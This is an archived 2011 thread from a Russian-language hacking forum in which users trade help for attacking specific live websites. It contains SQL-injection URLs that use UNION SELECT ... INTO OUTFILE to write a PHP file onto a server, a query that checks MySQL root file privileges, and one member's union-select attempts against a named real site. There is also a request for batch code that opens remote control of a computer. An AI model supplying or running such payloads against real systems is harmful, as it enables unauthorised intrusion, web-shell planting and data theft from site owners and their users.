FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1829 из 2422

1829

Опции темы

Поиск в этой теме

Опции просмотра

20.11.2011, 15:36

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от aydin-ka

aydin-ka said:
1) Попробуй подменить POST-запрос, через Tamper Data
2) SQL-injection есть??

sql-inj есть, щас попробую

20.11.2011, 15:42

aydin-ka

Новичок

Регистрация: 03.05.2009

Сообщений: 7

Провел на форуме:
102906

Репутация: -14

Цитата:

Сообщение от er9j6@

er9j6@ said:
sql-inj есть, щас попробую

1) http://site.com/index.php?id=-1'+union+select+1,2,'',4+into+outfile+'полны� � путь/1.php'--

P.S: у пользователя должны быть права на запись

2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+wh ere+user= 'root'--

Если появиться Y то действуй дальше

20.11.2011, 15:44

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Цитата:

Сообщение от aydin-ka

aydin-ka said:
1) http://site.com/index.php?id=-1'+union+select+1,2,'',4+into+outfile+'полны� � путь/1.php'--
P.S: у пользователя должны быть права на запись
2) http://site.com/index.php?id=-1'+union+select+1,2,File_Priv,4+from+mysql.user+wh ere+user= 'root'--
Если появиться
Y
то действуй дальше

Доступа к mysql нет.

20.11.2011, 16:09

Cherep

Новичок

Регистрация: 30.05.2010

Сообщений: 10

Провел на форуме:
42585

Репутация: 0

подскажите код батника, чтобы он открывал удаленное управление компьютером

20.11.2011, 21:47

Boolean

Guest

Сообщений: n/a

Провел на форуме:
40748

Репутация: 78

Цитата:

Сообщение от Cherep

Cherep said:
подскажите код батника, чтобы он открывал удаленное управление компьютером

Есть только батник кряк интернета, надо?

20.11.2011, 22:28

AppS

Познающий

Регистрация: 08.08.2009

Сообщений: 37

Провел на форуме:
162650

Репутация: 2

Отправить сообщение для AppS с помощью ICQ

Может ТС имел что то типо этого ?

hххp:/thread276456-telnet.html

21.11.2011, 01:38

o'clock

Новичок

Регистрация: 16.05.2009

Сообщений: 12

Провел на форуме:
135091

Репутация: 2

Цитата:

Сообщение от AppS

AppS said:
Может ТС имел что то типо этого ?
hххp:/thread276456-telnet.html

ТС имел ввиду вот это

Цитата:

Сообщение от darky

darky said:

В этой и только в этой теме вы можете задать вопрос проспособ заливки шелла, детальные разборки xss и sql на конкретных сайтах, не построенных на паблик движках(для остального есть поиск по форуму).

Все остальные вновь созданные темы по данным вопросам будут удаляться. Создавайте темы если вы хотите поделиться уязвимостью или нашли что-то новое интересное в публичном двиге и хотите чтобы вам помогли это разобрать.

Задавать вопросы ответы на которые с легкостью можно найти в многочисленных мануалах и статьях
крайне не рекомендуется

21.11.2011, 04:45

AppS

Познающий

Регистрация: 08.08.2009

Сообщений: 37

Провел на форуме:
162650

Репутация: 2

Это надо у него спросить

В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html

есть такой абзац

Цитата:

Сообщение от None

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --

Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все но что то сегодня мы с ним не дружим)

Заранее спасибо!

21.11.2011, 04:57

d1v

Новичок

Регистрация: 21.02.2009

Сообщений: 3

Провел на форуме:
58401

Репутация: 0

Цитата:

Сообщение от AppS

AppS said:
Это надо у него спросить
В общем вопрос состоит в следующем, вот тут в статье thread43966-sql.html
есть такой абзац
Тыкните пальцем где про это можно почитать? Я знаю что Гугл знает все
но что то сегодня мы с ним не дружим)
Заранее спасибо!

https://rdot.org/forum/showthread.php?t=352

#10

21.11.2011, 12:08

shadowrun

Guest

Сообщений: n/a

Провел на форуме:
183267

Репутация: 84

Ломал Железного Майка , но столкнулся с этим:

Код:

Code:
http://ironmiketyson.ru/article_read.php?id=1+union+select+1+--+

хотя,

Код:

Code:
http://ironmiketyson.ru/article_read.php?id=1+order+by+1+--+

обрабатывается нормально. Раньше не сталкивался...

Страница 1829 из 2422

1829

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)

Быстрый переход

ANTICHAT.XYZ